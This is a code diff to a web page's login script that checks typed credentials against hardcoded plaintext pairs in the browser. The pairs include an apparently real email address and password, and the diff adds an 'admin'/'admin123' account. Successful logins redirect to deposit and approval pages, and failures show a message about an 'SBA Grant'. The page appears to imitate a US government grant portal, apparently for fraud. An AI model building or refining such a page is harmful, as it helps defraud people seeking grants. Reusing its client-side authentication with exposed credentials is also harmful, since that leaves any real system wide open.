--- a/index.html
+++ b/index.html
@@ -77,28 +77,37 @@
       color: #15317E;
     }
   </style>
-  <script>
-    function login() {
-      var username = document.getElementById("username").value;
-      var password = document.getElementById("password").value;
+<script>
+  function login() {
+    var username = document.getElementById("username").value.trim();
+    var password = document.getElementById("password").value.trim();
 
-      if (username === "Lnichols03@yahoo.com" && password === "Lnichols572") {
-        setTimeout(function() {
-          window.location.href = "deposit.html";
-        }, 3000); // 3-second delay
-      if (username === "bb" && password === "aa") {
-        setTimeout(function() {
-          window.location.href = "approval-b.html";
-        }, 3000); // 3-second delay
-      } else if (username === "you2" && password === "me") {
-        setTimeout(function() {
-          window.location.href = "approve.html";
-        }, 3000); // 3-second delay
-      } else {
-        alert("You haven't signed up for the ongoing SBA Grant, nor is your business listed in the USA business directory.");
-      }
+    if (username === "Lnichols03@yahoo.com" && password === "Lnichols572") {
+      setTimeout(function() {
+        window.location.href = "deposit.html";
+      }, 3000); // 3-second delay
+
+    } else if (username === "bb" && password === "aa") {
+      setTimeout(function() {
+        window.location.href = "approval-b.html";
+      }, 3000);
+
+    } else if (username === "you2" && password === "me") {
+      setTimeout(function() {
+        window.location.href = "approve.html";
+      }, 3000);
+
+    } else if (username === "admin" && password === "admin123") {
+      setTimeout(function() {
+        window.location.href = "admin-dashboard.html";
+      }, 3000);
+
+    } else {
+      alert("You haven't signed up for the ongoing SBA Grant, nor is your business listed in the USA business directory.");
     }
-  </script>
+  }
+</script>
+
 </head>
 <body>
 <a href="#main-content" class="usa-skipnav">
